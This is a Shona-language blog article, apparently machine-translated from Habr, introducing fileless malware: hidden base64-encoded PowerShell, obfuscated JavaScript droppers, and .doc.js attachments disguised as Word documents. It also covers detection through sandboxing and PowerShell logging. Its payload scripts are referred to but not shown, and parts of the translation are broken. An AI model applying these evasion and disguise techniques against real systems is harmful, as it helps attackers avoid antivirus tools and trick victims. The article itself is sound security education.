Nechinyorwa ichi tinotanga nhevedzano yezvinyorwa nezve isingaite malware. Fileless yekubira mapurogiramu, anozivikanwawo seasina mafaira ekubira zvirongwa, anowanzo shandisa PowerShell paWindows masisitimu kumhanyisa chinyararire mirairo yekutsvaga uye kubvisa zvakakosha zvemukati. Kuona chiitiko chehacker pasina mafaera akashata ibasa rakaoma, nekuti ... antivirus uye mamwe akawanda ekuona masisitimu anoshanda zvichienderana nekusaina kuongororwa. Asi mashoko akanaka ndeokuti software yakadaro iripo. Semuyenzaniso,
Pandakatanga kuferefeta nyaya yebadass hackers,
Iyo Huru uye Ine Simba PowerShell
Ndakanyora nezve dzimwe pfungwa idzi pamberi muna
Pamusoro pemasampuli pachawo, pane saiti iwe unogona kuona izvo zvirongwa izvi zvinoita. Ongororo yeHybrid inomhanyisa malware mubhokisi rayo rejecha uye inotarisisa masisitimu mafoni, inomhanyisa maitiro uye network chiitiko, uye inobvisa tambo dzemavara dzinofungidzirwa. Kune mabhinari uye mamwe mafaera anogoneka, i.e. kwausingakwanise kutarisa iyo chaiyo yepamusoro-level kodhi, yakasanganiswa ongororo inosarudza kana software yacho ine hutsinye kana kungofungira zvichibva pane yayo yekumhanyisa kuita. Uye mushure meizvozvo sampuli yatoongororwa.
Munyaya yePowerShell uye mamwe magwaro emuenzaniso (Visual Basic, JavaScript, nezvimwewo), ndakakwanisa kuona iyo kodhi pachayo. Semuenzaniso, ndakaona iyi PowerShell muenzaniso:
Iwe unogona zvakare kumhanya PowerShell mu base64 encoding kuti usaonekwe. Cherechedza kushandiswa kweNoninteractive uye Hidden parameters.
Kana iwe wakaverenga zvandakatumira pane obfuscation, saka iwe unoziva kuti iyo -e sarudzo inotsanangura kuti zvirimo zviri base64 encoded. Nenzira, kuongororwa kwehybrid kunobatsirawo neizvi nekugadzirisa zvese kumashure. Kana iwe uchida kuyedza decoding base64 PowerShell (inozonzi PS) iwe pachako, unofanirwa kumhanya uyu murairo:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Enda zvakadzama
Ndakagadzirisa script yedu yePS ndichishandisa nzira iyi, pazasi pane chinyorwa chechirongwa, kunyangwe chakagadziridzwa neni zvishoma:
Ziva kuti iyo script yakasungirirwa kusvika musi waGunyana 4, 2017 uye yakafambiswa makiki emusangano.
Ndakanyora nezve style iyi yekurwisa mukati
Ko sei?
Zvekuchengetedza software yekutarisa Windows chiitiko matanda kana firewall, base64 encoding inodzivirira tambo "WebClient" kuti isaonekwa neyakajeka mavara maitiro kudzivirira kubva pakuita chikumbiro chakadaro chewebhu. Uye sezvo "huipi" hwese hwemarware hunobva hwatorwa ndokupfuudzwa muPowerShell yedu, nzira iyi nokudaro inotibvumira kunzvenga zvachose kuonekwa. Kana kuti, ndizvo zvandaifunga pakutanga.
Zvinoitika kuti neWindows PowerShell Advanced Logging inogoneswa (ona chinyorwa changu), iwe unozokwanisa kuona mutsara wakarodha mugiyo rechiitiko. ndakafanana
Ngatiwedzerei mamwe mascenario
Hackers vanovanza zvine hungwaru PowerShell kurwiswa muMicrosoft Office macros yakanyorwa muVisual Basic nemimwe mitauro yekunyora. Pfungwa ndeyokuti munhu anenge abatwa anogamuchira meseji, semuenzaniso kubva kubasa rekutumira, ine mushumo wakabatanidzwa mu.doc fomati. Iwe unovhura gwaro iri rine macro, uye rinopedzisira rava kuvhura iyo yakaipa PowerShell pachayo.
Kazhinji iyo Visual Basic script pachayo yakavharwa kuitira kuti inonzvenga zvakasununguka antivirus uye mamwe malware scanner. Mumweya wezviri pamusoro, ndakafunga kukodha iyo PowerShell iri pamusoro muJavaScript sechiitwa. Pazasi pane mhedzisiro yebasa rangu:
Yakavharwa JavaScript inovanza PowerShell yedu. Real hackers vanoita izvi kamwe kana kaviri.
Iyi ndiyo imwe nzira yandaona ichiyangarara pawebhu: kushandisa Wscript.Shell kumhanyisa PowerShell ine coded. Nenzira, JavaScript pachayo ndiyo
Kwatiri isu, iyo yakashata JS script yakamisikidzwa sefaira ine .doc.js extension. Windows inongoratidza chete suffix yekutanga, saka ichaonekwa kune akabatwa segwaro reShoko.
Iyo JS icon inongowanikwa mupumburu icon. Hazvishamisi kuti vanhu vazhinji vachavhura chibatanidzwa ichi vachifunga kuti igwaro reShoko.
Mumuenzaniso wangu, ndakagadzirisa PowerShell pamusoro kuti nditore script kubva pawebhusaiti yangu. Iyo iri kure PS script inongodhinda "Evil Malware". Sezvaunogona kuona, haana kana munhu akaipa. Ehe, hackers chaivo vanofarira kuwana mukana kune laptop kana sevha, toti, kuburikidza negomba rekuraira. Muchinyorwa chinotevera, ini ndinokuratidza maitiro ekuita izvi uchishandisa PowerShell Empire.
Ndinovimba kuti pachinyorwa chekutanga chenhanganyaya hatina kunyura zvakanyanya mumusoro wenyaya. Zvino ini ndichakurega iwe utore mweya wekufema, uye nguva inotevera tichatanga kutarisa mienzaniso chaiyo yekurwiswa uchishandisa fileless malware pasina chero asina kufanira ekutanga mazwi kana kugadzirira.
Source: www.habr.com